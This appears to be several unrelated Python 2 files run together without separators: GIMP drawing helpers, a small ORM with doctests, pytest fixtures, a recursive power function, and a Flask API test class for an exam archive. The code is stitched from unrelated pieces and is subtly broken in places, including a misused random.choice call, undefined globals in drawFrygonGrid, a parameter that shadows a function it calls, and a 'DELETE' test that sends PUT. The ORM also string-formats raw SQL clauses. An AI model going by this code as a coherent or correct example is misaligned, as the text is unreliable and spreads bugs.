def inkBlotStack(depth=16,layer_mode=6, flatten=0):
    for x in range(1,depth):
        image = gimp_be.gimp.image_list()[0]
        drawable = gimp_be.pdb.gimp_image_active_drawable(image)
        qL()
        gimp_be.pdb.gimp_layer_set_mode(gimp_be.pdb.gimp_image_get_active_layer(image), layer_mode)
        drawInkBlot()
        if flatten:
            if not x%flatten:
                flatten()

def gridCenters(grid=[]):
    if grid==[]:
        grid=[4,3]
    image = gimp_be.gimp.image_list()[0]
    row_width = image.width/(grid[0])
    columb_height = image.height/(grid[1])
    tile_centers = [] 
    for row in range(0,grid[0]):
        for columb in range(0,grid[1]):
            tile_centers.append([row_width*row+row_width/2,columb_height*columb+columb_height/2])
    return tile_centers

def tile(grid=[],option="mibd",irregularity=0.3):
    image=gimp_be.gimp.image_list()[0]
    layer=gimp_be.pdb.gimp_image_get_active_layer(image)
    if grid==[]:
        if image.height == image.width:
            grid=[4,4]
        elif image.height < image.width:
            grid=[3,4]
        else:
            grid=[4,3]
    if "m" in option:
        mask = gimp_be.pdb.gimp_layer_create_mask(layer,0)
        gimp_be.pdb.gimp_image_add_layer_mask(image, layer,mask)
        editLayerMask(1)
    drawable = gimp_be.pdb.gimp_image_active_drawable(image)
    grid_spacing = image.width/grid[0]
    tile_centers=gridCenters(grid)
    if irregularity > 0.0:
        i_tiles=[]
        for tile in tile_centers:
            tile[0]=tile[0]+random.randrange((-1*int(grid_spacing*irregularity)),int(grid_spacing*irregularity))
            tile[1]=tile[1]+random.randrange((-1*int(grid_spacing*irregularity)),int(grid_spacing*irregularity))
            i_tiles.append(tile)
        tile_centers=i_tiles
    if "b" in option:
        randomBrush()
    if "d" in option:
        randomDynamics()
    brushSize(grid_spacing)
    brushColor(0,0,0)
    for tile in tile_centers:
        if "m" in option:
            editLayerMask(1)
        if irregularity == 0:
            gimp_be.pdb.gimp_paintbrush_default(drawable, len(tile), tile)
        elif random.randrange(50.0*irregularity)+random.randrange(50.0*irregularity)>50.0:
            randomDynamics()
        else:
            gimp_be.pdb.gimp_paintbrush_default(drawable, len(tile), tile)
    if "g" in option:
        gimp_be.pdb.plug_in_gauss(image, drawable, 20.0, 20.0, 0)
    if "w" in option:
        gimp_be.pdb.plug_in_whirl_pinch(image, drawable, 90, 0.0, 1.0)
    if "i" in option:
        gimp_be.pdb.gimp_invert(drawable)
    if "m" in option:
        editLayerMask(0)

def drawAkuTree(branches=6,tree_height=0, position=0):
    image = gimp_be.gimp.image_list()[0]
    drawable = gimp_be.pdb.gimp_image_active_drawable(image)
    if position==0:
        position=[]
        position.append(random.randrange(image.width))
        position.append(random.randrange(4*tree_height/3, 3*image.height/4))
    if tree_height == 0:
        tree_height=random.randrange(position[1]/3, position[1]-position[1]/25)
    print 'position:' + str(position)
    #draw trunk
    trunk=[position[0],position[1],position[0],position[1]-tree_height]
    trunk_size=tree_height/40+3
    print str(trunk)
    print 'tree_height: ' + str(tree_height)
    print 'trunk size: ' + str(trunk_size)
    brushSize(trunk_size)
    drawLine(trunk)
    for node in range(branches):
        node_base=[position[0],position[1]-((node*tree_height+1)/branches+tree_height/25+random.randrange(-1*tree_height/12,tree_height/12))]
        base_length=tree_height/25
        node_end=[]
        if node%2==0:
            node_end=[node_base[0]+base_length/2,node_base[1]-base_length/2]
            brushSize(2*trunk_size/3)
            drawLine([node_base[0],node_base[1],node_end[0],node_end[1]])
            brushSize(trunk_size/3)
            drawLine([node_end[0],node_end[1],node_end[0],node_end[1]-tree_height/12-(tree_height/48)])
        else:
            node_end=[node_base[0]-base_length/2,node_base[1]-base_length/2]
            brushSize(2*trunk_size/3)
            drawLine([node_base[0],node_base[1],node_end[0],node_end[1]])
            brushSize(trunk_size/3)
            drawLine([node_end[0],node_end[1],node_end[0],node_end[1]-(tree_height/12)])

def drawAkuForest(num=25):
    for x in range(num):
        drawAkuTree()

# draw a tree
def drawTree(x1=-1, y1=-1, angle=270, depth=9, recursiondepth=0):
    image = gimp_be.gimp.image_list()[0]
    drawable = gimp_be.pdb.gimp_image_active_drawable(image)
    if x1 == -1:
        x1 = image.width/2
    if y1 == -1:
        y1 = image.height/2
    x2 = x1 + int(math.cos(math.radians(angle)) * depth * 10.0)
    y2 = y1 + int(math.sin(math.radians(angle)) * depth * 10.0)
    ctrlPoints = (x1, y1, x2, y2)
    if recursiondepth <= 2:
        brushColor(87, 53, 12)
    elif depth == 1:
        brushColor(152, 90, 17)
    elif depth <= 3:
        brushColor(7, 145, 2)
    brushSize(depth * 4 + 5)
    gimp_be.pdb.gimp_paintbrush_default(drawable, len(ctrlPoints), ctrlPoints)
    if depth > 0:
        drawTree(x2, y2, angle - 20, depth - 1, recursiondepth + 1)
        drawTree(x2, y2, angle + 20, depth - 1, recursiondepth + 1)

# draw a tree with 3 branches per node
def drawTriTree(x1=-1, y1=-1, angle=270, depth=6, recursiondepth=0, size=10):
    image = gimp_be.gimp.image_list()[0]
    drawable = gimp_be.pdb.gimp_image_active_drawable(image)
    if x1 == -1:
        x1 = image.width/2
    if y1 == -1:
        y1 = image.height/2
    if depth:
        x2 = x1 + int(math.cos(math.radians(angle)) * depth * size) + random.randrange(-12, 12)
        y2 = y1 + int(math.sin(math.radians(angle)) * depth * size) + random.randrange(-12, 12)
        ctrlPoints = (x1, y1, x2, y2)
        brushSize(depth + int(size/10))
        brushColor()
        gimp_be.pdb.gimp_paintbrush_default(drawable, len(ctrlPoints), ctrlPoints)
        drawTriTree(x2, y2, angle - 30, depth - 1, recursiondepth + 1,size)
        drawTriTree(x2, y2, angle, depth - 1, recursiondepth + 1,size)
        drawTriTree(x2, y2, angle + 30, depth - 1, recursiondepth + 1,size)

# draw random color tri-tree
def drawColorTriTree(x1=-1, y1=-1, angle=270, depth=9, recursiondepth=0):
    image = gimp_be.gimp.image_list()[0]
    drawable = gimp_be.pdb.gimp_image_active_drawable(image)
    if x1 == -1:
        x1 = image.width/2
    if y1 == -1:
        y1 = image.height/2
    brushSize(depth + 1)
    if depth:
        x2 = x1 + int(math.cos(math.radians(angle)) * depth * 10.0) + random.randrange(-12, 12)
        y2 = y1 + int(math.sin(math.radians(angle)) * depth * 10.0) + random.randrange(-12, 12)
        ctrlPoints = (x1, y1, x2, y2)
        gimp_be.pdb.gimp_paintbrush_default(drawable, len(ctrlPoints), ctrlPoints)
        drawColorTriTree(x2, y2, angle - 20 + random.choice(-10, -5, 0, 5, 10), depth - 1, recursiondepth + 1)
        drawColorTriTree(x2, y2, angle + random.choice(-10, -5, 0, 5, 10), depth - 1, recursiondepth + 1)
        drawColorTriTree(x2, y2, angle + 20 + random.choice(-10, -5, 0, 5, 10), depth - 1, recursiondepth + 1)

# draw a tree
def drawOddTree(x1=-1, y1=-1, angle=270, depth=9, recursiondepth=0):
    image = gimp_be.gimp.image_list()[0]
    drawable = gimp_be.pdb.gimp_image_active_drawable(image)
    if x1 == -1:
        x1 = image.width/2
    if y1 == -1:
        y1 = image.height/2
    brushSize((depth * 8 + 30))
    if depth:
        x2 = x1 + int(math.cos(math.radians(angle)) * depth * 10.0)
        y2 = y1 + int(math.sin(math.radians(angle)) * depth * 10.0)
        ctrlPoints = (x1, y1, x2, y2)
        gimp_be.pdb.gimp_paintbrush_default(drawable, len(ctrlPoints), ctrlPoints)
        if not random.randrange(0, 23) == 23:
            drawTree(x2, y2, angle - 20, depth - 1, recursiondepth + 1)
            if depth % 2 == 0:
                drawTree(x2, y2, angle + 20, depth - 1, recursiondepth + 1)
            if (depth + 1) % 4 == 0:
                drawTree(x2, y2, angle + 20, depth - 1, recursiondepth + 1)
            if depth == 5:
                drawTree(x2, y2, angle - 45, depth - 1, recursiondepth + 1)
                drawTree(x2, y2, angle + 45, depth - 1, recursiondepth + 1)

# draw a tree
def drawForestTree(x1=-1, y1=-1, angle=270, depth=7, size=10, recursiondepth=0):
    image = gimp_be.gimp.image_list()[0]
    drawable = gimp_be.pdb.gimp_image_active_drawable(image)
    if x1 == -1:
        x1 = image.width/2
    if y1 == -1:
        y1 = image.height/2
    if depth:
        x2 = x1 + int(math.cos(math.radians(angle)) * depth * 10.0)
        y2 = y1 + int(math.sin(math.radians(angle)) * depth * 10.0)
        ctrlPoints = (x1, y1, x2, y2)
        brushSize(depth * depth * (int(size / ((image.height - y1)) / image.height)) + 4)
        gimp_be.pdb.gimp_paintbrush_default(drawable, len(ctrlPoints), ctrlPoints)
        if not random.randrange(0, 23) == 23:
            drawForestTree(x2, y2, angle - 20, depth - 1, size, recursiondepth + 1)
            if random.randrange(0, 23) == 23:
                drawForestTree(x2, y2, angle - random.randrange(-30, 30), depth - 1, size, recursiondepth + 1)
                drawForestTree(x2, y2, angle - random.randrange(-30, 30), depth - 1, size, recursiondepth + 1)
                drawForestTree(x2, y2, angle - random.randrange(-30, 30), depth - 1, size, recursiondepth + 1)
            else:
                drawForestTree(x2, y2, angle - random.randrange(15, 50), depth - 1, size, recursiondepth + 1)
                if depth % 2 == 0:
                    drawForestTree(x2, y2, angle + 20, depth - 1, size, recursiondepth + 1)
                if (depth + 1) % 4 == 0:
                    drawForestTree(x2, y2, angle + 20, depth - 1, size, recursiondepth + 1)
                if depth == 5:
                    drawForestTree(x2, y2, angle - 45, depth - 1, size, recursiondepth + 1)
                    drawForestTree(x2, y2, angle + 45, depth - 1, size, recursiondepth + 1)

# draw a series of trees with a y position based on depth
def drawForest(trees, options):
    image = gimp_be.gimp.image_list()[0]
    for tree in range(0, trees):
        y1 = 2 * (image.height / 3) + random.randrange(-1 * (image.height / 5), image.height / 5)
        x1 = random.randrange(image.width / 20, 19 * (image.width / 20))
        angle = random.randrange(250, 290)
        size = (y1 / (2.0 * (image.height / 3.0) + (image.height / 5.0))) + 4
        depth = random.randrange(3, 7)
        drawForestTree(x1, y1, angle, depth, size)

#draws polygon of N sides at a x-y location
def drawPolygon(sides=5,size=300,x_pos=0,y_pos=0, angle_offset=0):
    image = gimp_be.gimp.image_list()[0]
    drawable = gimp_be.pdb.gimp_image_active_drawable(image)
    if y_pos==0:
        y_pos=image.height/2
        if x_pos==0:
            x_pos=image.width/2
    degree_between_points=360/sides
    points_list=[]
    for x in range(0,sides+1):
        point_degree=degree_between_points*x+angle_offset
        points_list.append(int(round(math.sin(math.radians(point_degree))*size))+x_pos)
        points_list.append(int(round(math.cos(math.radians(point_degree))*size))+y_pos)
    fade_out=0
    method=0
    gradient_length=0
    gimp_be.pdb.gimp_paintbrush(drawable, fade_out, len(points_list), points_list, method, gradient_length)

#draw a grid of polygons of N sides
def drawPolygonGrid(size=60,sides=3, angle_offset=0):
    image = gimp_be.gimp.image_list()[0]
    drawable = gimp_be.pdb.gimp_image_active_drawable(image)
    if sides%2 == 1 or sides>4:
        for y in range(0-image.height/10,image.height+image.height/10, size):
            x_loop=0
            for x in range(0-image.width/10, image.width+image.width/10, size):
                if x_loop%2==1:
                    drawPolygon(sides,size-size/2,x-(size/2),y,360/sides)
                else:
                    drawPolygon(sides,size-size/2,x,y,0)
                x_loop=x_loop+1
    else:
        for x in range(0-image.height/10,image.height+image.height/10, size):
            for y in range(0-image.width/10, image.width+image.width/10, size):
                drawPolygon(sides,size/3,x,y,0)
    degree_between_points=360/sides
    points_list=[]
    for x in range(0,sides+1):
        point_degree=math.radians(degree_between_points*x+angle_offset)
        points_list.append(int(round(math.sin(point_degree)*size)))
        points_list.append(int(round(math.cos(point_degree)*size)))
    fade_out=0
    method=0
    gradient_length=0
    gimp_be.pdb.gimp_paintbrush(drawable, fade_out, len(points_list), points_list, method, gradient_length)

def drawFrygon(sides=5,size=300,x_pos=0,y_pos=0, angle_offset=0):
    image = gimp_be.gimp.image_list()[0]
    drawable = gimp_be.pdb.gimp_image_active_drawable(image)
    if y_pos==0:
        y_pos=image.height/2
        if x_pos==0:
            x_pos=image.width/2
    degree_between_points=360/sides
    points_list=[]
    for x in range(0,sides+1):
        point_degree=degree_between_points*x+angle_offset
        points_list.append(int(round(math.sin(point_degree)*size))+y_pos)
        points_list.append(int(round(math.cos(point_degree)*size))+x_pos)
    fade_out=0
    method=0
    gradient_length=0
    gimp_be.pdb.gimp_paintbrush(drawable, fade_out, len(points_list), points_list, method, gradient_length)

def drawFrygonGrid(size=120,sides=13):
    global height, width
    if sides%2 == 1:
        for x in range(0,height,size):
            x_deep=0
            for y in range(0, width,size):
                if x_deep%2==1:
                    drawFrygon(sides,size,x,y-(size/2),0)
                else:
                    drawFrygon(sides,size,x,y,0)
                x_deep=x_deep+1
    else:
        for x in range(0,height, size):
            for y in range(0, width, size):
                drawFrygon(sides,size,x,y,0)

#!/usr/bin/env python
# coding:utf-8

"""
Database operation module. This module is independent with web module.
"""

import time, logging

import db

class Field(object):

    _count = 0

    def __init__(self, **kw):
        self.name = kw.get('name', None)
        self.ddl = kw.get('ddl', '')
        self._default = kw.get('default', None)

        self.comment = kw.get('comment', '')
        self.nullable = kw.get('nullable', False)
        self.updatable = kw.get('updatable', True)
        self.insertable = kw.get('insertable', True)

        self.unique_key = kw.get('unique_key', False)
        self.non_unique_key = kw.get('key', False)
        self.primary_key = kw.get('primary_key', False)

        self._order = Field._count
        Field._count += 1

    @property
    def default(self):
        d = self._default
        return d() if callable(d) else d

    def __str__(self):
        s = ['<%s:%s,%s,default(%s),' % (self.__class__.__name__, self.name, self.ddl, self._default)]
        self.nullable and s.append('N')
        self.updatable and s.append('U')
        self.insertable and s.append('I')
        s.append('>')
        return ''.join(s)

class StringField(Field):

    def __init__(self, **kw):
        if not 'default' in kw:
            kw['default'] = ''
        if not 'ddl' in kw:
            kw['ddl'] = 'varchar(255)'
        super(StringField, self).__init__(**kw)

class IntegerField(Field):

    def __init__(self, **kw):
        if not 'default' in kw:
            kw['default'] = 0
        if not 'ddl' in kw:
            kw['ddl'] = 'bigint'
        super(IntegerField, self).__init__(**kw)

class FloatField(Field):

    def __init__(self, **kw):
        if not 'default' in kw:
            kw['default'] = 0.0
        if not 'ddl' in kw:
            kw['ddl'] = 'real'
        super(FloatField, self).__init__(**kw)

class BooleanField(Field):

    def __init__(self, **kw):
        if not 'default' in kw:
            kw['default'] = False
        if not 'ddl' in kw:
            kw['ddl'] = 'bool'
        super(BooleanField, self).__init__(**kw)

class TextField(Field):

    def __init__(self, **kw):
        if not 'default' in kw:
            kw['default'] = ''
        if not 'ddl' in kw:
            kw['ddl'] = 'text'
        super(TextField, self).__init__(**kw)

class BlobField(Field):

    def __init__(self, **kw):
        if not 'default' in kw:
            kw['default'] = ''
        if not 'ddl' in kw:
            kw['ddl'] = 'blob'
        super(BlobField, self).__init__(**kw)

class VersionField(Field):

    def __init__(self, name=None):
        super(VersionField, self).__init__(name=name, default=0, ddl='bigint')


class DateTimeField(Field):

    def __init__(self, **kw):
        if 'ddl' not in kw:
            kw['ddl'] = 'datetime'
        super(DateTimeField, self).__init__(**kw)


class DateField(Field):

    def __init__(self, **kw):
        if 'ddl' not in kw:
            kw['ddl'] = 'date'
        super(DateField, self).__init__(**kw)


class EnumField(Field):

    def __init__(self, **kw):
        if 'ddl' not in kw:
            kw['ddl'] = 'enum'
        super(EnumField, self).__init__(**kw)

_triggers = frozenset(['pre_insert', 'pre_update', 'pre_delete'])

def _gen_sql(table_name, mappings):
    pk, unique_keys, keys = None, [], []
    sql = ['-- generating SQL for %s:' % table_name, 'create table `%s` (' % table_name]
    for f in sorted(mappings.values(), lambda x, y: cmp(x._order, y._order)):
        if not hasattr(f, 'ddl'):
            raise StandardError('no ddl in field "%s".' % f)
        ddl = f.ddl
        nullable = f.nullable
        has_comment = not (f.comment == '')
        has_default = f._default is not None
        left = nullable and '  `%s` %s' % (f.name, ddl) or '  `%s` %s not null' % (f.name, ddl)
        mid = has_default and ' default \'%s\'' % f._default or None
        right = has_comment and ' comment \'%s\',' % f.comment or ','
        line = mid and '%s%s%s' % (left, mid, right) or '%s%s' % (left, right)
        if f.primary_key:
            pk = f.name
            line = '  `%s` %s not null auto_increment,' % (f.name, ddl)
        elif f.unique_key:
            unique_keys.append(f.name)
        elif f.non_unique_key:
            keys.append(f.name)
        sql.append(line)
    for uk in unique_keys:
        sql.append('  unique key(`%s`),' % uk)
    for k in keys:
        sql.append('  key(`%s`),' % k)
    sql.append('  primary key(`%s`)' % pk)
    sql.append(')ENGINE=InnoDB DEFAULT CHARSET=utf8;')
    return '\n'.join(sql)

class ModelMetaclass(type):
    """
    Metaclass for model objects.
    """
    def __new__(cls, name, bases, attrs):
        # skip base Model class:
        if name == 'Model':
            return type.__new__(cls, name, bases, attrs)

        # store all subclasses info:
        if not hasattr(cls, 'subclasses'):
            cls.subclasses = {}
        if not name in cls.subclasses:
            cls.subclasses[name] = name
        else:
            logging.warning('Redefine class: %s', name)

        logging.info('Scan ORMapping %s...', name)
        mappings = dict()
        primary_key = None
        for k, v in attrs.iteritems():
            if isinstance(v, Field):
                if not v.name:
                    v.name = k
                logging.debug('Found mapping: %s => %s' % (k, v))
                # check duplicate primary key:
                if v.primary_key:
                    if primary_key:
                        raise TypeError('Cannot define more than 1 primary key in class: %s' % name)
                    if v.updatable:
                        # logging.warning('NOTE: change primary key to non-updatable.')
                        v.updatable = False
                    if v.nullable:
                        # logging.warning('NOTE: change primary key to non-nullable.')
                        v.nullable = False
                    primary_key = v
                mappings[k] = v
        # check exist of primary key:
        if not primary_key:
            raise TypeError('Primary key not defined in class: %s' % name)
        for k in mappings.iterkeys():
            attrs.pop(k)
        if '__table__' not in attrs:
            attrs['__table__'] = name.lower()
        attrs['__mappings__'] = mappings
        attrs['__primary_key__'] = primary_key
        attrs['__sql__'] = lambda self: _gen_sql(attrs['__table__'], mappings)
        for trigger in _triggers:
            if trigger not in attrs:
                attrs[trigger] = None
        return type.__new__(cls, name, bases, attrs)

class Model(dict):
    """
    Base class for ORM.

    >>> class User(Model):
    ...     id = IntegerField(primary_key=True)
    ...     name = StringField()
    ...     email = StringField(updatable=False)
    ...     passwd = StringField(default=lambda: '******')
    ...     last_modified = FloatField()
    ...     def pre_insert(self):
    ...         self.last_modified = time.time()
    >>> u = User(id=10190, name='Michael', email='orm@db.org')
    >>> r = u.insert()
    >>> u.email
    'orm@db.org'
    >>> u.passwd
    '******'
    >>> u.last_modified > (time.time() - 2)
    True
    >>> f = User.get(10190)
    >>> f.name
    u'Michael'
    >>> f.email
    u'orm@db.org'
    >>> f.email = 'changed@db.org'
    >>> r = f.update() # change email but email is non-updatable!
    >>> len(User.find_all())
    1
    >>> g = User.get(10190)
    >>> g.email
    u'orm@db.org'
    >>> r = g.mark_deleted()
    >>> len(db.select('select * from user where id=10190'))
    0
    >>> import json
    >>> print User().__sql__()
    -- generating SQL for user:
    create table `user` (
      `id` bigint not null,
      `name` varchar(255) not null,
      `email` varchar(255) not null,
      `passwd` varchar(255) not null,
      `last_modified` real not null,
      primary key(`id`)
    );
    """
    __metaclass__ = ModelMetaclass

    def __init__(self, **kw):
        super(Model, self).__init__(**kw)

    def __getattr__(self, key):
        try:
            return self[key]
        except KeyError:
            raise AttributeError(r"'Dict' object has no attribute '%s'" % key)

    def __setattr__(self, key, value):
        self[key] = value

    @classmethod
    def get(cls, key_name, key_value):
        """
        Get by primary/unique key.
        """
        d = db.select_one('select * from %s where %s=?' % (cls.__table__, key_name), key_value)
        if not d:
            # TODO: change to logging?
            raise AttributeError("Can't find in [%s] where %s=[%s]" % (cls.__table__, key_name, key_value))
        return cls(**d) if d else None

    @classmethod
    def find_first(cls, where, *args):
        """
        Find by where clause and return one result. If multiple results found, 
        only the first one returned. If no result found, return None.
        """
        d = db.select_one('select * from %s %s' % (cls.__table__, where), *args)
        return cls(**d) if d else None

    @classmethod
    def find_all(cls, *args):
        """
        Find all and return list.
        """
        L = db.select('select * from `%s`' % cls.__table__)
        return [cls(**d) for d in L]

    @classmethod
    def find_by(cls, cols, where, *args):
        """
        Find by where clause and return list.
        """
        L = db.select('select %s from `%s` %s' % (cols, cls.__table__, where), *args)
        if cols.find(',') == -1 and cols.strip() != '*':
            return [d[0] for d in L]
        return [cls(**d) for d in L]

    @classmethod
    def count_all(cls):
        """
        Find by 'select count(pk) from table' and return integer.
        """
        return db.select_int('select count(`%s`) from `%s`' % (cls.__primary_key__.name, cls.__table__))

    @classmethod
    def count_by(cls, where, *args):
        """
        Find by 'select count(pk) from table where ... ' and return int.
        """
        return db.select_int('select count(`%s`) from `%s` %s' % (cls.__primary_key__.name, cls.__table__, where), *args)

    def update(self):
        self.pre_update and self.pre_update()
        L = []
        args = []
        for k, v in self.__mappings__.iteritems():
            if v.updatable:
                if hasattr(self, k):
                    arg = getattr(self, k)
                else:
                    arg = v.default
                    setattr(self, k, arg)
                L.append('`%s`=?' % k)
                args.append(arg)
        pk = self.__primary_key__.name
        args.append(getattr(self, pk))
        db.update('update `%s` set %s where %s=?' % (self.__table__, ','.join(L), pk), *args)
        return self

    def delete(self):
        self.pre_delete and self.pre_delete()
        pk = self.__primary_key__.name
        args = (getattr(self, pk), )
        db.update('delete from `%s` where `%s`=?' % (self.__table__, pk), *args)
        return self

    def insert(self):
        self.pre_insert and self.pre_insert()
        params = {}
        for k, v in self.__mappings__.iteritems():
            if v.insertable:
                if not hasattr(self, k):
                    setattr(self, k, v.default)
                params[v.name] = getattr(self, k)
        try:
            db.insert('%s' % self.__table__, **params)
        except Exception as e:
            logging.info(e.args)
            print "MySQL Model.insert() error: args=", e.args
            # TODO !!! generalize ORM return package
            # return {'status': 'Failure', 'msg': e.args,  'data': self}
            raise
        return self

if __name__ == '__main__':
    logging.basicConfig(level=logging.DEBUG)
    db.create_engine('www-data', 'www-data', 'test')
    db.update('drop table if exists user')
    db.update('create table user (id int primary key, name text, email text, passwd text, last_modified real)')
    import doctest
    doctest.testmod()

import pytest

from tests.base import Author, Post, Comment, Keyword, fake


def make_author():
    return Author(
        id=fake.random_int(),
        first_name=fake.first_name(),
        last_name=fake.last_name(),
        twitter=fake.domain_word(),
    )


def make_post(with_comments=True, with_author=True, with_keywords=True):
    comments = [make_comment() for _ in range(2)] if with_comments else []
    keywords = [make_keyword() for _ in range(3)] if with_keywords else []
    author = make_author() if with_author else None
    return Post(
        id=fake.random_int(),
        title=fake.catch_phrase(),
        author=author,
        author_id=author.id if with_author else None,
        comments=comments,
        keywords=keywords,
    )


def make_comment(with_author=True):
    author = make_author() if with_author else None
    return Comment(id=fake.random_int(), body=fake.bs(), author=author)


def make_keyword():
    return Keyword(keyword=fake.domain_word())


@pytest.fixture()
def author():
    return make_author()


@pytest.fixture()
def authors():
    return [make_author() for _ in range(3)]


@pytest.fixture()
def comments():
    return [make_comment() for _ in range(3)]


@pytest.fixture()
def post():
    return make_post()


@pytest.fixture()
def post_with_null_comment():
    return make_post(with_comments=False)


@pytest.fixture()
def post_with_null_author():
    return make_post(with_author=False)


@pytest.fixture()
def posts():
    return [make_post() for _ in range(3)]

# Declaring a Function
def recurPowerNew(base, exp):

    # Base case is when exp = 0
    if exp <= 0:
        return 1
        
    # Recursive Call
    elif exp % 2 == 0:
        return recurPowerNew(base*base, exp/2)

    return base * recurPowerNew(base, exp - 1)

'''
Testing class for database API's course related functions.

Authors: Ari Kairala, Petteri Ponsimaa
Originally adopted from Ivan's exercise 1 test class.
'''

import unittest, hashlib
import re, base64, copy, json, server
from database_api_test_common import BaseTestCase, db
from flask import json, jsonify
from exam_archive import ExamDatabaseErrorNotFound, ExamDatabaseErrorExists
from unittest import TestCase
from resources_common import COLLECTIONJSON, PROBLEMJSON, COURSE_PROFILE, API_VERSION

class RestCourseTestCase(BaseTestCase):
    '''
    RestCourseTestCase contains course related unit tests of the database API.
    '''

    # List of user credentials in exam_archive_data_dump.sql for testing purposes
    super_user = "bigboss"
    super_pw = hashlib.sha256("ultimatepw").hexdigest()
    admin_user = "antti.admin"
    admin_pw = hashlib.sha256("qwerty1234").hexdigest()
    basic_user = "testuser"
    basic_pw = hashlib.sha256("testuser").hexdigest()
    wrong_pw = "wrong-pw"

    test_course_template_1 = {"template": {
        "data": [
                 {"name": "archiveId", "value": 1},
                 {"name": "courseCode", "value": "810136P"},
                 {"name": "name", "value": "Johdatus tietojenk\u00e4sittelytieteisiin"},
                 {"name": "description", "value": "Lorem ipsum"},
                 {"name": "inLanguage", "value": "fi"},
                 {"name": "creditPoints", "value": 4},
                 {"name": "teacherId", "value": 1}]
    }
    }
    test_course_template_2 = {"template": {
        "data": [
                 {"name": "archiveId", "value": 1},
                 {"name": "courseCode", "value": "810137P"},
                 {"name": "name", "value": "Introduction to Information Processing Sciences"},
                 {"name": "description", "value": "Aaa Bbbb"},
                 {"name": "inLanguage", "value": "en"},
                 {"name": "creditPoints", "value": 5},
                 {"name": "teacherId", "value": 2}]
    }
    }

    course_resource_url =               '/exam_archive/api/archives/1/courses/1/'
    course_resource_not_allowed_url =   '/exam_archive/api/archives/2/courses/1/'
    courselist_resource_url =           '/exam_archive/api/archives/1/courses/'

    # Set a ready header for authorized admin user
    header_auth = {'Authorization': 'Basic ' + base64.b64encode(super_user + ":" + super_pw)}

    # Define a list of the sample contents of the database, so we can later compare it to the test results

    @classmethod
    def setUpClass(cls):
        print "Testing ", cls.__name__

    def test_user_not_authorized(self):
        '''
        Check that user in not able to get course list without authenticating.
        '''
        print '(' + self.test_user_not_authorized.__name__ + ')', \
            self.test_user_not_authorized.__doc__

        # Test CourseList/GET
        rv = self.app.get(self.courselist_resource_url)
        self.assertEquals(rv.status_code,401)
        self.assertEquals(PROBLEMJSON,rv.mimetype)

        # Test CourseList/POST
        rv = self.app.post(self.courselist_resource_url)
        self.assertEquals(rv.status_code,401)
        self.assertEquals(PROBLEMJSON,rv.mimetype)

        # Test Course/GET
        rv = self.app.get(self.course_resource_url)
        self.assertEquals(rv.status_code,401)
        self.assertEquals(PROBLEMJSON,rv.mimetype)

        # Test Course/PUT
        rv = self.app.put(self.course_resource_url)
        self.assertEquals(rv.status_code,401)
        self.assertEquals(PROBLEMJSON,rv.mimetype)

        # Test Course/DELETE
        rv = self.app.put(self.course_resource_url)
        self.assertEquals(rv.status_code,401)
        self.assertEquals(PROBLEMJSON,rv.mimetype)

        # Try to Course/POST when not admin or super user
        rv = self.app.post(self.courselist_resource_url, headers={'Authorization': 'Basic ' + \
                                                                base64.b64encode(self.basic_user + ":" + self.basic_pw)})
        self.assertEquals(rv.status_code,403)
        self.assertEquals(PROBLEMJSON,rv.mimetype)

        # Try to delete course, when not admin or super user
        rv = self.app.delete(self.course_resource_url, headers={'Authorization': 'Basic ' + \
                                                                base64.b64encode(self.basic_user + ":" + self.basic_pw)})
        self.assertEquals(rv.status_code,403)
        self.assertEquals(PROBLEMJSON,rv.mimetype)

        # Try to get Course list as basic user from unallowed archive
        rv = self.app.get(self.course_resource_not_allowed_url, headers={'Authorization': 'Basic ' + \
                                                                base64.b64encode(self.basic_user + ":" + self.basic_pw)})
        self.assertEquals(rv.status_code,403)
        self.assertEquals(PROBLEMJSON,rv.mimetype)

        # Try to get Course list as super user with wrong password
        rv = self.app.get(self.courselist_resource_url, headers={'Authorization': 'Basic ' + \
                                                                base64.b64encode(self.super_user + ":" + self.wrong_pw)})
        self.assertEquals(rv.status_code,401)
        self.assertEquals(PROBLEMJSON,rv.mimetype)

    def test_user_authorized(self):
        '''
        Check that authenticated user is able to get course list.
        '''
        print '(' + self.test_user_authorized.__name__ + ')', \
            self.test_user_authorized.__doc__

        # Try to get Course list as basic user from the correct archive
        rv = self.app.get(self.course_resource_url, headers={'Authorization': 'Basic ' + \
                                                                base64.b64encode(self.basic_user + ":" + self.basic_pw)})
        self.assertEquals(rv.status_code,200)
        self.assertEquals(COLLECTIONJSON+";"+COURSE_PROFILE,rv.content_type)

        # User authorized as super user
        rv = self.app.get(self.courselist_resource_url, headers={'Authorization': 'Basic ' + \
                                                                base64.b64encode(self.super_user + ":" + self.super_pw)})
        self.assertEquals(rv.status_code,200)
        self.assertEquals(COLLECTIONJSON+";"+COURSE_PROFILE,rv.content_type)

    def test_course_get(self):
        '''
        Check data consistency of Course/GET and CourseList/GET.
        '''

        print '(' + self.test_course_get.__name__ + ')', \
            self.test_course_get.__doc__
        # Test CourseList/GET
        self._course_get(self.courselist_resource_url)
        # Test single course Course/GET
        self._course_get(self.course_resource_url)

    def _course_get(self, resource_url):
        '''
        Check data consistency of CourseList/GET.
        '''

        # Get all the courses from database
        courses = db.browse_courses(1)

        # Get all the courses from API
        rv = self.app.get(resource_url, headers=self.header_auth)
        self.assertEquals(rv.status_code,200)
        self.assertEquals(COLLECTIONJSON+";"+COURSE_PROFILE,rv.content_type)

        input = json.loads(rv.data)
        assert input

        # Go through the data
        data = input['collection']
        items = data['items']

        self.assertEquals(data['href'], resource_url)
        self.assertEquals(data['version'], API_VERSION)

        for item in items:
            obj = self._create_dict(item['data'])
            course = db.get_course(obj['courseId'])
            assert self._isIdentical(obj, course)

    def test_course_post(self):
        '''
        Check that a new course can be created.
        '''
        print '(' + self.test_course_post.__name__ + ')', \
            self.test_course_post.__doc__

        resource_url = self.courselist_resource_url
        new_course = self.test_course_template_1.copy()

        # Test CourseList/POST
        rv = self.app.post(resource_url, headers=self.header_auth, data=json.dumps(new_course))
        self.assertEquals(rv.status_code,201)

        # Post returns the address of newly created resource URL in header, in 'location'. Get the identifier of
        # the just created item, fetch it from database and compare.
        location = rv.location
        location_match = re.match('.*courses/([^/]+)/', location)
        self.assertIsNotNone(location_match)
        new_id = location_match.group(1)

        # Fetch the item from database and set it to course_id_db, and convert the filled post template data above to
        # similar format by replacing the keys with post data attributes.
        course_in_db = db.get_course(new_id)
        course_posted = self._convert(new_course)

        # Compare the data in database and the post template above.
        self.assertDictContainsSubset(course_posted, course_in_db)

        # Next, try to add the same course twice - there should be conflict
        rv = self.app.post(resource_url, headers=self.header_auth, data=json.dumps(new_course))
        self.assertEquals(rv.status_code,409)

